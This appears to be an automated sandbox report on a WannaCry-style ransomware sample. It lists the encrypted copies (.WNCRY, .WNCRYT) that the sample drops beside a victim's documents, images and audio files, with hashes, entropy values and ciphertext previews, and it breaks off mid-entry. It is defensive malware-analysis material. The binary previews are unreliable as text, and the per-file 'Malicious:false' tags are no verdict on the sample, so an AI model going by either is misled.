                                Preview:WANACRY!.....M......k.i.xQ>..>8..t. .j...^.y|W..4..7...R..S.....#.s.|.2].4..'..............MI.`..2......^.y....h#......n--'/|T.]j)...*.YO.O.&q^?fa.9..C..^.l..+.kI.r...Y.....}*......v#.v.>h0..z.D..]2.e....HY..0#l...g....U.3...g.f!L..Jw.........p.+.x...'.W.............=.I.........`2.Cq.'..-|.0.I.kV....=.:b0S.dF.....?....][.lEY.*...MU..:..8.....2A~H..+@.<.)..F-.{..F.\..Z.N.|..v...b|..j.uy....,.....W.}.h}.......,.c...S..m........G!..(2...8..q..M.%.x..uS.G...m.U..t..s.H..U9.ksC8c.7I.J...........].b..w.........O......5..v....I...........|wJ.+To...TC..B..]*..{.XFz....k......v./.[B..wR.C"}2.,....Go,t^A..|..l"S..~V.WUa.u.oU......Yc..Fc....C"....b...CX...F...6+V6.........sw.C.c.eB.....`j....j.3FW..%.g.X....P....0..gh..3..Z5...ole.8G.)..lY..b...w.........[A..39U.[.....Z.oe.w....'..kH.jz\(.Q..8.....;;.\V.g.s..CDv..g.._?AK|8..6......Q!.......Ca.v..,v=...~n .x.H.@Y..+....R...$'wC..-8...).................7...U....qI.`.D<..&e..U..F..Q=...P.{s...$.H{

                                C:\Users\user\Documents\SQSJKEBWDT\SQSJKEBWDT.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.801069531693805
                                Encrypted:false
                                SSDEEP:24:3Bduhh2YqUw5V4ujJniOLKqpIv59sZU/DCpTq6DIn:buhhGUUVVtrpmIICpT/8n
                                MD5:3B3C2DBF05EB52364A54F40B4BA42FA2
                                SHA1:328F9E49D284E9AC79519857B24D40D798FA8CD7
                                SHA-256:2E9B2EAF90D6E09B3C35E389285FA7CDE7F3CAC59FC46D0C5D19BC7893BE021B
                                SHA-512:E391A23F620FB32E830C8324A2D5A9C89EE5F89F25CED8C3113AD347AE82CA3FB6048DCA6D591F0FD10C6FFA423873BF3B93479F4C1AC197723078DC00AF0C3E
                                Malicious:false
                                Reputation:unknown
                                Preview:.o........T.0E^!*2......S.&.P.h.....ax\....Z.wg.H. =..M..t......m(+u.V....k.......W9..k...LE.C...`..X.m.E...s.p.w4b..Z...k.._....|...<...$..l.H.?eKa.J.....UO..Vc2.u.....vI.".t..v....v3.V$....X ...{ya.y.E.....zC.221.9.........Y.%..h.Y.p..p0'4.....'....t;X....,....\[..$...E ......R.@.Q.I.5..,a:..N.m..:..w....s.m.........l"...O.x......I.P"Te..5.....Y$(..9..2.,......n.W.."...5Uy....`.'S....'w/r.E.r.F..p...A...r....i.b....6.....0R...IV...b'.v...5z..dV...@.gV...7...W....P.$..b.F.6..Q....a.+{..!.!...f&.8$.L)_9!...u..K[..[./.......t(....Mz.....a c.m.J..ePl..h.\....U(O5..:u^...zJ..#.&.....P+l..c1...FrH\...1h.:y.i[Z..0R..U\...O..n...z...6.............{..@.v...=f...L..zZY...G$..P5@k..hG....../=.i-..E4.lG...^...c..F.G*...L=.A...._...*5.2..&b.I...H~4.o.I/...'ue..l<H.....h.vn."..CgkH..p5.&_..._E....@O.k.....@..Q......G#.W... ./.f..6X.,..O=.....-.....FDm..m.kF.!.{...[..9......CmP..KA.N`7^Q......g9.9..-{.Q......R.V.....z.....}.y9O.<.y...I.y}.....q.1-.

                                C:\Users\user\Documents\SQSJKEBWDT\SQSJKEBWDT.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.836803931340838
                                Encrypted:false
                                SSDEEP:24:bkSIldIU9GAYAEpFwrB1c8dbcsBk9KRqkqY2EOUMVOTwEUrhIg:bkSzbxfFwr7nRcYPLQESnEUz
                                MD5:FAFB85C1E434EB4D95669B4B0C16221C
                                SHA1:FE8CAE52DF52C89D37E40FD85F9C72C0740A3320
                                SHA-256:33068912BD041B826988D6DDAB238313D8CF6774FEAE6F844C0B334B1C526AF5
                                SHA-512:73DC96B2356AB4A1D1375A6592611E4737F4D673950D2D97450255556C92A6641383ED3E745E5AD1D70C14721B082B3BF59AECE3E321A326CDDB2B68259DA452
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....qG]..e.S....9.uLJ......kc..W2.6zU.......u..{....O.F.O.bc.`8z.)a.5A.m'.3B...!.0...._..q....Z..)......O..g.s.x-....|Z..T[.|..............$.."...4.P_J.b..X..k..[..h.CL-c2....!+.....z...N.CG..FkO.6.F!.L.(.X[B.n.d..1{.&.)M...R...)T.S..%.....L..s.............p...c.=b.u.!f.D2U.(.&...|s..7.Y...-B.3...Gem..T...q.-.`Q......=.Z..p...M...4n2U.../e6#6K6/..i0.sf.3/..@w......3.z.1...n.....E($Y.._...doj.Z.Fj0B.c...8..;...P|{.s.*v..|.\...|....CM=9.( \..X7.......i......k+wH..;.. e9."0(..!-........=Z.v.(..G=.........n.e..k.6..6.O.......n.Zp..\n. ...Vu$z...?cR....6.G..x.`....6.me...[;f...:..q.-+...km.fg..;....N.tjXl..H#...a/.[.Sn..b"...P _i..^.=.,.F;....N.E...k.$0~..#...?....=J.A.r.<..(.. ...fDO..A.._/..3q.P.......v'..6.K8F...q]`.h."-V....W.B....2........jGZ.b.N...<.^..+.,..Xp.x.(j.#R.V..#..c.S.]..|..tD`B..........}..!B.n.ttv...}...u.k..Er..%..........p.y....l.......+.]@D...f..?....k...j..}....T. 8...n*........\.X.. ....Bo...~.....|/.r..f..F#......$

                                C:\Users\user\Documents\SQSJKEBWDT\SQSJKEBWDT.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.836803931340838
                                Encrypted:false
                                SSDEEP:24:bkSIldIU9GAYAEpFwrB1c8dbcsBk9KRqkqY2EOUMVOTwEUrhIg:bkSzbxfFwr7nRcYPLQESnEUz
                                MD5:FAFB85C1E434EB4D95669B4B0C16221C
                                SHA1:FE8CAE52DF52C89D37E40FD85F9C72C0740A3320
                                SHA-256:33068912BD041B826988D6DDAB238313D8CF6774FEAE6F844C0B334B1C526AF5
                                SHA-512:73DC96B2356AB4A1D1375A6592611E4737F4D673950D2D97450255556C92A6641383ED3E745E5AD1D70C14721B082B3BF59AECE3E321A326CDDB2B68259DA452
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....qG]..e.S....9.uLJ......kc..W2.6zU.......u..{....O.F.O.bc.`8z.)a.5A.m'.3B...!.0...._..q....Z..)......O..g.s.x-....|Z..T[.|..............$.."...4.P_J.b..X..k..[..h.CL-c2....!+.....z...N.CG..FkO.6.F!.L.(.X[B.n.d..1{.&.)M...R...)T.S..%.....L..s.............p...c.=b.u.!f.D2U.(.&...|s..7.Y...-B.3...Gem..T...q.-.`Q......=.Z..p...M...4n2U.../e6#6K6/..i0.sf.3/..@w......3.z.1...n.....E($Y.._...doj.Z.Fj0B.c...8..;...P|{.s.*v..|.\...|....CM=9.( \..X7.......i......k+wH..;.. e9."0(..!-........=Z.v.(..G=.........n.e..k.6..6.O.......n.Zp..\n. ...Vu$z...?cR....6.G..x.`....6.me...[;f...:..q.-+...km.fg..;....N.tjXl..H#...a/.[.Sn..b"...P _i..^.=.,.F;....N.E...k.$0~..#...?....=J.A.r.<..(.. ...fDO..A.._/..3q.P.......v'..6.K8F...q]`.h."-V....W.B....2........jGZ.b.N...<.^..+.,..Xp.x.(j.#R.V..#..c.S.]..|..tD`B..........}..!B.n.ttv...}...u.k..Er..%..........p.y....l.......+.]@D...f..?....k...j..}....T. 8...n*........\.X.. ....Bo...~.....|/.r..f..F#......$

                                C:\Users\user\Documents\SQSJKEBWDT\ZGGKNSUKOP.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8009335500453405
                                Encrypted:false
                                SSDEEP:24:+P5UFPb+hWc5gbc5MeMPnQwDNOP+0cOYOwqUZNbg:+Pwbh46ZQwVBbbZNE
                                MD5:C76C97AF5155D8D45C77251AC058B05D
                                SHA1:FD97918328EEC651C2097481AF79E1897BDBE808
                                SHA-256:E03718FB35B91D44CE72F65B795A0CF9A1564C78FF16E50328ECC5BD5CF87FCC
                                SHA-512:8A6CC72F5197023B24CA909356BC7B12A86AE146822876266B2A5DE592018B152F8D29374D07C63107739614A926FC763E994BA9FDAB75176E14A95554FBF302
                                Malicious:false
                                Reputation:unknown
                                Preview:.e..N?....-..!.g..;a.......o .$....Iw{..1..H....y.j..uS....p..DG... ..6......:....7zO..{V.#.....)Szb.."5'k1?..j....Y2.....<.c{....U7.5....W<..V...I..l.....`.{.M.......Y#....%.T."..;.o.....U{H..L...t..:..^O..0....KG....~.)...C3P...O.-....G(.<.Z...C..R._?|xX.Y......_..J'A.2M.....?..h'../.$..'. f...@.Y@....WP.v.Z....`y..X......C...".....R.N.G.i*...a...#.....z....AT.%.#.#-#...VYg).......U........as0.?....<....}.wa5..@,....9....O....0.WYG......J..}.i.~m.D.\..D....b....B...(x).&.?.7...3A.`.....\...Q..0..?2._.r.r-UkU...[......_.g-l..X...V...K..>|].....n..d...S8...!.......k.d.V.G..I.E*.&...nOy.T....G...u.........[...t....B."...x9.iB...Q9Y.+m..mS.i.4...{..=g.O.N9.k......*.l.Q0..[.,a..#.v.$w...Y.....V.=..s......R.+......`...aJ..;......"p...T.......Up..I.`.v...4....dY.....v/o@...*r....C... .i'..Hgc~..5:.M-.....>......G.Q)..n,va....7.l_.T."..k........,e...d.C%.....w. Z...._..e.}..t..9.6.6.5P"w.......&Z...w2Sr^...8..n.y....H5..

                                C:\Users\user\Documents\SQSJKEBWDT\ZGGKNSUKOP.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833916873906602
                                Encrypted:false
                                SSDEEP:24:bkgRoECWkwH6Z897rIDd72cOEGKw55MU4YVxfmUp54YnHh8ei1Pn3:bkcvq89C724w5Bz/xHhTGP3
                                MD5:27B4C825BBD61ECFEB3292BFAAEF6FE0
                                SHA1:47BC282AE45772BF1C2B6C90343A7426A1027CAF
                                SHA-256:7CAB22321FDCBC765CD758F79F565899FA829FBCF6ABB19BEE88E8105B64B38E
                                SHA-512:3976CC257818A9CA28BB423AA32FFB16D2844D16F56C851B665D0BCF4046DE576B07B17456968F23025649681E31227FC28598BD73373A40F98E7541344ABCAC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......#. 8.Bx....u..3..?...^....{..~...?.0.u.~..D...X..%.h..}..A.:%..Mc$2....=.....x=o--.uD|..!..^.JW..r....5ZP.....DBV/..f.q.x.e$...&0.}./.}...i.}.XL.``...2....u...n..'...Hz../8...N*..`...1*..A.C.W.6a;.XV19...O..E4.U..K..\V....$.qG..8.=.i.iXs..{..............gep^B.O^.T.......@.......pa...Z.F(..V....b..wE.A8.?Y...gdR.8..J...(w.0.h(.J....H.;..F.D..{^..f..".#..'\H.l...Kc....3&..jm..*5ybX|C.z...M?......*..\.`...z..-0.#...F..^.h.*..W...R.g.6..)Ak...ah..r...?.?..3...v.n...u..=.......Y.msbX....L.&.b..8L.m.rE.\....#.(~d.......0b.s....._0..~...i..z.6u$....I]^...G./r.....|p..OU...-......h...Y....0p...dW.H4.K...YC...).r.>:....e..2...=O.QQU..).=.6..... 6...Bm&L.!K...W.&f4B....=...PW.MA.._..}2X^]|.[.q..../.....0.)..."3..c...j..#o^.........4!.59t.&|Z/.b..).qIOl'8.C.............M..B..6\.{T0a?x<.|...t.vb.|..1.....}.....C=.G..j.O..i2Fc..[2.LH.'.d...8@..T.|....9e....h....#Z...c...$.vK..z,.:l......F......\..]...L.l..$k...T....DJ..V...P$... .o...bg

                                C:\Users\user\Documents\SQSJKEBWDT\ZGGKNSUKOP.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833916873906602
                                Encrypted:false
                                SSDEEP:24:bkgRoECWkwH6Z897rIDd72cOEGKw55MU4YVxfmUp54YnHh8ei1Pn3:bkcvq89C724w5Bz/xHhTGP3
                                MD5:27B4C825BBD61ECFEB3292BFAAEF6FE0
                                SHA1:47BC282AE45772BF1C2B6C90343A7426A1027CAF
                                SHA-256:7CAB22321FDCBC765CD758F79F565899FA829FBCF6ABB19BEE88E8105B64B38E
                                SHA-512:3976CC257818A9CA28BB423AA32FFB16D2844D16F56C851B665D0BCF4046DE576B07B17456968F23025649681E31227FC28598BD73373A40F98E7541344ABCAC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......#. 8.Bx....u..3..?...^....{..~...?.0.u.~..D...X..%.h..}..A.:%..Mc$2....=.....x=o--.uD|..!..^.JW..r....5ZP.....DBV/..f.q.x.e$...&0.}./.}...i.}.XL.``...2....u...n..'...Hz../8...N*..`...1*..A.C.W.6a;.XV19...O..E4.U..K..\V....$.qG..8.=.i.iXs..{..............gep^B.O^.T.......@.......pa...Z.F(..V....b..wE.A8.?Y...gdR.8..J...(w.0.h(.J....H.;..F.D..{^..f..".#..'\H.l...Kc....3&..jm..*5ybX|C.z...M?......*..\.`...z..-0.#...F..^.h.*..W...R.g.6..)Ak...ah..r...?.?..3...v.n...u..=.......Y.msbX....L.&.b..8L.m.rE.\....#.(~d.......0b.s....._0..~...i..z.6u$....I]^...G./r.....|p..OU...-......h...Y....0p...dW.H4.K...YC...).r.>:....e..2...=O.QQU..).=.6..... 6...Bm&L.!K...W.&f4B....=...PW.MA.._..}2X^]|.[.q..../.....0.)..."3..c...j..#o^.........4!.59t.&|Z/.b..).qIOl'8.C.............M..B..6\.{T0a?x<.|...t.vb.|..1.....}.....C=.G..j.O..i2Fc..[2.LH.'.d...8@..T.|....9e....h....#Z...c...$.vK..z,.:l......F......\..]...L.l..$k...T....DJ..V...P$... .o...bg

                                C:\Users\user\Documents\ZGGKNSUKOP.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8221945248161004
                                Encrypted:false
                                SSDEEP:24:sen4xpSkY7xt1MS9zTq8MOVYsRFREaQjwtqsCvq2:senopa9zJYGFpQTsoq2
                                MD5:E04504D117FF1C640ADD01A66F016303
                                SHA1:3998EFC829A74687D2220211010E3179C55A1516
                                SHA-256:F80108933806A316D083289121073D78F6501AD3AD9220F4D2F6644842DED102
                                SHA-512:326AB37575F51BF7E567913FBE584AB77322FCB0A694BCB4491B83E1472FDABA55F95AB36E71DB8FB45F517BA6846C2FE264DC95BA54B763E88675409777BA85
                                Malicious:false
                                Reputation:unknown
                                Preview:UN.i.`.......u..(+.....a...e.M....i.aC...Lr...B...u.l...f>U..Q....O../.....\...A+.On.|.[....L.A..YS..C@..J.....9m.1.g+).......x..)t...D.j.Y.7.o./}.o|\.S<....8.......~..v)..n-...d..Ym.n}..(s.f...z6...'FQ..X..].G.64c/W..&d.v%.w..A.;.j.Ub&._.....Xv..T.....&hN.rH....,.J...{PR......o.M.g.h.9(.>.,.....]...U.P.p.....^.W.V..!E..f.........x.O.x......C....jm..CP..#...S..B.n......Ti....zW.z'.|.@7_...$...tX..{^....~.....ZMv...D%.l.6y..?.JQ/.|.!%c...........%.z..8a$.Y..........a..J.s...."..]..o^....!/#..C...g.........u.K.C....\>L@.2......K.6..7.....sUy@e./r....o.+..ai...n._x...w..Y.JV..E.-...}t0...7!....%J....f#_...I....l.o..@=m.5...C\.N.-....e@9...;... .s..X.Bg.u\......".@3...d.......".@..?xRo...OdX..V...S.V..d|#..`*.r....W.Ow<.>.Nfg{O......_..;xZ...N.}.4.M....2..[..Z......s ....2.{",.V.Q....}x...T.)D..z.@oI.a..l..=..}.....q1.^...N....[.vn...........ZD......G&~%..|-4Y...:..|.....\.]k.G.....l.5N.M...Xb..z..Y.:.w.H....N.v..-...F.=...lv.(7(..)..].

                                C:\Users\user\Documents\ZGGKNSUKOP.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833732535096494
                                Encrypted:false
                                SSDEEP:24:bkXa6SCrfQLVadCBE+DwK63Wgfbbqanhr+cnWdFZxUq0UkIsU1UxVyj11uI8v:bkmBadCBE+DwV3TqqGFZxUq1jUqj1kIq
                                MD5:40E0AB96F2EAD8A3A41A27EAB5FDC40F
                                SHA1:C9D9F7DF4ED293CF37507B2393579EBE2C596FF6
                                SHA-256:63B8385B0300444B85EBD38456083DE2A661EA2441B3139B5D2923F6ADBE1748
                                SHA-512:DBEF27E7E88D159F6A161109A13FB484CB9745CEDF2285B0E9CA2F9C2059953AA6E5C541B983016766E7DBAA4267D00CD201B58AFD32C3BA12AB7018B8B0F4BC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......N:....z4.x.:.......l.N....]..d.V~../+..E.hZ....)..j;FK1.../...5GT........G>Xl..SMou..6.....&.....E.....m....7.....S.Q....C9.Bl....N..7.>.tH.]]...V....l....P.V .T.L+K....G3p.jn'&..m.T.3.j.XsC.r7.....<.f...OA.....DR.....8>@..I.....\.....Z................D.5$k.i.<#..0...lNc........._.O....&.KV.|...%..Yf..0..B.k...NIJ_....r...Q.N.\.s...4....._...jhW...[&C.{s*.~.N>........o...$f......S.E.M.%.c..8...../$.0.,,..L@.hA,'.......(..Z.SmPW.....fO.3.B......js..9..J.N..xH..$.....%.;...m|....O....By....xc.+n60.!ip.}.[........,.}.< .7....`.1.....yM.._.M=r....h.......(B.5.I....E..I5$t+.rL.. ..6.\.N.p...pR.n..G9~M|..*..K.C.N~...\Vw.1T.8:b<K.t.t..6t++.c...(b.:..5.!&=..._.-...X.@.'h.k...._q=.Z..w!GhU.n..o..:...D^.Y.^G.9.~..s.v..|.&..F..............d.......[kN.}.K.D.....<rM,6A..`.G.f....J...GX..<......5../<3_.....UY..~f?.....H.j(...Xb..&'i...4..e@q.?..o..P.m.a.[.N.z......|L..4=;..P..Q.5\...T.F........r..c`Q..Fi.N..g.jG. -...H`}1.....1.=.=.

                                C:\Users\user\Documents\ZGGKNSUKOP.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.833732535096494
                                Encrypted:false
                                SSDEEP:24:bkXa6SCrfQLVadCBE+DwK63Wgfbbqanhr+cnWdFZxUq0UkIsU1UxVyj11uI8v:bkmBadCBE+DwV3TqqGFZxUq1jUqj1kIq
                                MD5:40E0AB96F2EAD8A3A41A27EAB5FDC40F
                                SHA1:C9D9F7DF4ED293CF37507B2393579EBE2C596FF6
                                SHA-256:63B8385B0300444B85EBD38456083DE2A661EA2441B3139B5D2923F6ADBE1748
                                SHA-512:DBEF27E7E88D159F6A161109A13FB484CB9745CEDF2285B0E9CA2F9C2059953AA6E5C541B983016766E7DBAA4267D00CD201B58AFD32C3BA12AB7018B8B0F4BC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......N:....z4.x.:.......l.N....]..d.V~../+..E.hZ....)..j;FK1.../...5GT........G>Xl..SMou..6.....&.....E.....m....7.....S.Q....C9.Bl....N..7.>.tH.]]...V....l....P.V .T.L+K....G3p.jn'&..m.T.3.j.XsC.r7.....<.f...OA.....DR.....8>@..I.....\.....Z................D.5$k.i.<#..0...lNc........._.O....&.KV.|...%..Yf..0..B.k...NIJ_....r...Q.N.\.s...4....._...jhW...[&C.{s*.~.N>........o...$f......S.E.M.%.c..8...../$.0.,,..L@.hA,'.......(..Z.SmPW.....fO.3.B......js..9..J.N..xH..$.....%.;...m|....O....By....xc.+n60.!ip.}.[........,.}.< .7....`.1.....yM.._.M=r....h.......(B.5.I....E..I5$t+.rL.. ..6.\.N.p...pR.n..G9~M|..*..K.C.N~...\Vw.1T.8:b<K.t.t..6t++.c...(b.:..5.!&=..._.-...X.@.'h.k...._q=.Z..w!GhU.n..o..:...D^.Y.^G.9.~..s.v..|.&..F..............d.......[kN.}.K.D.....<rM,6A..`.G.f....J...GX..<......5../<3_.....UY..~f?.....H.j(...Xb..&'i...4..e@q.?..o..P.m.a.[.N.z......|L..4=;..P..Q.5\...T.F........r..c`Q..Fi.N..g.jG. -...H`}1.....1.=.=.

                                C:\Users\user\Documents\ZGGKNSUKOP.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.819752227099647
                                Encrypted:false
                                SSDEEP:24:/HWaNUzGT3InGK4XduXvqNsFL2+3epyNXBJaz+xhLsiqEF:/HXqGcGVe1+yZazKhLxF
                                MD5:D19869A107385A44A62379D03093602E
                                SHA1:833D57810D30680E02B660EB563BB04F4DDDF5FA
                                SHA-256:33EA6E1DFBCDC4798810550352B572B834CFBD4A6AA9AB89371548C95E1D7C21
                                SHA-512:E9E114F004404776BE3CE4EFD89A766875CF46608C845092B092E31A6CA053CEAF8AFAC7B98F3631369F70443369415F86DD4005B81B3FFE11A8772D77864238
                                Malicious:false
                                Reputation:unknown
                                Preview:M..8\.`.0iU.4....j+.n.|t.=.K.f...w.j...J.yq..H.*..X.=.....bh...e..i.E..y.]..G9M..S...yV..&pha.m1..'.!..(.>.;......"-V....i.....b..[...@^QW.~FZ..;y..i.@.T..}.wB.3....$........I....N.K.\.^..\..3.N...F...n._E....WI..BOR".>...%.mys..........1....J.{.....<.+..u...pY..Y....(....w...|?,..D...r.f8.4Z..f...Q....v.XY....4`TT8...b2./.:y;.g..v<....H.a.@.c?..1St..M.H.k...`.N...Vk..U..........E?.g"...I..l...YQU.N.T0..-;5V.....1.:6\\...{..fk.XA..?..W.l%(p...<.U.9..........:..m..p.......:%.. p......+...,.w......Pb.Q.?.K.P.Y....S.=M..sX*t....v..~...q...5.*...{^..$|.\K.Z.I..9}..p#)...8l...HrP.T....Q.M.....l...?.m.....a....$H.?E.d".8....(....&..L.:.,...o....U......QX.}i4(.|j.H:>>..h.d..l@.:..P.4..`...z.D...(.8.^..{..m....R,.f..Z.n%...f...-.>J.it....\W<@6...Up...W..A+(.@g..wJf.6.p6. ..m...@.C...o.zbN..R.X|[......}<"......Z...'.:0dk.j...r..*.3[.j..d9..Q...R.......C.o.SDv.R.2.;/.k~.Z....}s.y.lKZ5...r+....I......Cm+..X...U....!.Z.Eb.jd..*D.9r..x."..l..zM

                                C:\Users\user\Documents\ZGGKNSUKOP.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83943220356204
                                Encrypted:false
                                SSDEEP:24:bk/VwyDVkuCNebKNJYgB74Sb8r3EN0SY26DeJs0tDhCJmwZ1K8gP7fUDA2Wy:bkrDceKNJY2dwr3E7Y26y20tDCmJxPI9
                                MD5:8ADF20532C370B655FC150B98C0458EA
                                SHA1:EE125A373B58C35235F2A0E0265FD18AF499108A
                                SHA-256:9299F8102F8EF90D36CF02680571E2F38B808A9E10EBA711BB69B85327292497
                                SHA-512:1DEC64B6ECDB4770FF54880666C3F7BE2EAF6A5F66EE7901129C3B3C309A754292BF8BBD3EB9C883C2E8810EFA22828D54930FF34ABCC53DE9470EBD9FD53814
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....v..g...KR..N.zQYWd...vRru..:a.1.K...fwM.L...4QbhJ.....Y.|....'.............V.".q.|(.M..E..C.7....2...>E.B......FR.....,.k..+...9..!.....X.<.8..Y6.."..fCfAv..p..v.G.j.......VuT....,....a.......7a.......X...v..r{......o...5....7cJ.....M.d.~;"................u0P.3.s3.. ..D..B..=e..9...7.......f{G..W.).........t..=....H./.\-.)#+..a.."....v......r8}A.\.W...7.e.........C....;N...#..l..L.N./Q|...<..p..A...zU..........oGc..@:.?...6...a..A..BI.G.).5.A..~..A7.....gs....f..YP@.K../M3.~..n.......+.......R.c.1....E.?.../..O..W.S[P.l..#...4.B..[.x#h..02..3!:NS._..V;....4.[...q..Q`.....?.s._...KL....'..~e..?..W..4.w.K...V{ gj......A..x.J..`.._..........;.w<.W._.....F/.........yI<Y..~<I...`^..;..E..m..D..."....:.q.>.8.k....2.K.Au.._..a....xO..0a.....Rw%}{...~...+.f...]..CB.Xr..;.-un.J...UA..e....{z.E..kU"..aT.^..8eO...7.#..Fn..O;0......4Z(...[...{..d5...8..}SX...*..G.R.`1..S....w0.,.m..w.a...4m...m...WU......8..^.{.$..$. ...t.l..U..J...

                                C:\Users\user\Documents\ZGGKNSUKOP.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83943220356204
                                Encrypted:false
                                SSDEEP:24:bk/VwyDVkuCNebKNJYgB74Sb8r3EN0SY26DeJs0tDhCJmwZ1K8gP7fUDA2Wy:bkrDceKNJY2dwr3E7Y26y20tDCmJxPI9
                                MD5:8ADF20532C370B655FC150B98C0458EA
                                SHA1:EE125A373B58C35235F2A0E0265FD18AF499108A
                                SHA-256:9299F8102F8EF90D36CF02680571E2F38B808A9E10EBA711BB69B85327292497
                                SHA-512:1DEC64B6ECDB4770FF54880666C3F7BE2EAF6A5F66EE7901129C3B3C309A754292BF8BBD3EB9C883C2E8810EFA22828D54930FF34ABCC53DE9470EBD9FD53814
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....v..g...KR..N.zQYWd...vRru..:a.1.K...fwM.L...4QbhJ.....Y.|....'.............V.".q.|(.M..E..C.7....2...>E.B......FR.....,.k..+...9..!.....X.<.8..Y6.."..fCfAv..p..v.G.j.......VuT....,....a.......7a.......X...v..r{......o...5....7cJ.....M.d.~;"................u0P.3.s3.. ..D..B..=e..9...7.......f{G..W.).........t..=....H./.\-.)#+..a.."....v......r8}A.\.W...7.e.........C....;N...#..l..L.N./Q|...<..p..A...zU..........oGc..@:.?...6...a..A..BI.G.).5.A..~..A7.....gs....f..YP@.K../M3.~..n.......+.......R.c.1....E.?.../..O..W.S[P.l..#...4.B..[.x#h..02..3!:NS._..V;....4.[...q..Q`.....?.s._...KL....'..~e..?..W..4.w.K...V{ gj......A..x.J..`.._..........;.w<.W._.....F/.........yI<Y..~<I...`^..;..E..m..D..."....:.q.>.8.k....2.K.Au.._..a....xO..0a.....Rw%}{...~...+.f...]..CB.Xr..;.-un.J...UA..e....{z.E..kU"..aT.^..8eO...7.#..Fn..O;0......4Z(...[...{..d5...8..}SX...*..G.R.`1..S....w0.,.m..w.a...4m...m...WU......8..^.{.$..$. ...t.l..U..J...

                                C:\Users\user\Documents\ZGGKNSUKOP.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7981482626715035
                                Encrypted:false
                                SSDEEP:24:3FnKcCN1iRGrGGykz9poRMe59JBF4SwgRcLQgfR0an:AcCN1iQrtl9poRMeV34bgRja
                                MD5:869DE36ABB794747F650FC31F8ECCB8C
                                SHA1:C3979F7A8DBE909623C87FCDFDA249C586898487
                                SHA-256:3231296BDBFEA2041801C7CA247C0E4876021ACD4E7CF34029F4B478DBC4B2D8
                                SHA-512:8F12002E09759C839107A12E583EEDC3C4B56CAA6A415AECB5E875DFD876B52724E9D4CCF27042DD3BE83D23513693E4C32C98A6E7648573A5B88FFC143CA2BD
                                Malicious:false
                                Reputation:unknown
                                Preview:i.....?.K...H.B..nf..Fm..E.t<.,.M.P...b..7......W..A....Kby.!.......`d[W.F9.x....8X0.yS.UG.;.m2U...^.......b..0...p.2>Pn..jheL.h......*-x.w.u9...J....E..G...sc.0j.........U..\..a._..N..\.#y'.......x..aa........j>6<........LO....l.$.V9...zSv&..Ex^...x....*...o.`....x..-2.]...s-....MX..S.2.gL.B}r.(..n3.q.N.kb.QC7:...E,.NmQ..~.~U`V.,+."...i...a)..`.1.G..W..X.((.N.1.T..2..cn...D..Nm......;.Y.8j.......j....F>..S.._..KV.(t./..0.......t..p.R.e'..A...,c..5(.Au0.28,ih7..v..L/.....o.*d....._...w.X.,...e#.]z....u.....T.....sn0.v.... ......5._..N.V...[W..Cu'..Q.%.D.<.i7.I.2.|1..9`U.M.*7.k.I.G.3*.0'..7..~..H.....Z...s.Q$:..>..Q.#R......kB`.e..dt.IY%/..7$.VK..4p*..h\5.!3z.!Kf.T.(;L.T....zN....1b.........=u2.B.[./F..mn..4).)i....b..a.rb.[...\....z..Z.l...R.$.GjZU..).}..._......0..|..AH).d.'....8....$.....Q`Ci68iw.>@.A..K.q.n|..G....[(.s..7..:...D.9z..;......<...p..@.P...R.pT....q.=..!.#+...i.9..ry.T.U5>..}.n..}f.8_.,FT.....D.BFb..'&.....-...u...=.0t....D.S..

                                C:\Users\user\Documents\ZGGKNSUKOP.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832345468265153
                                Encrypted:false
                                SSDEEP:24:bkM6+2667wlhj7kpB+KBL+IOayqtSMsSj9VsTxN6zm7c2F2VXiiAyyj9Q63s7Vj6:bkz667uj7E+UtShS5AxszGjMOyYIVCb
                                MD5:E8752016336FA3CDD3A76B780320A97D
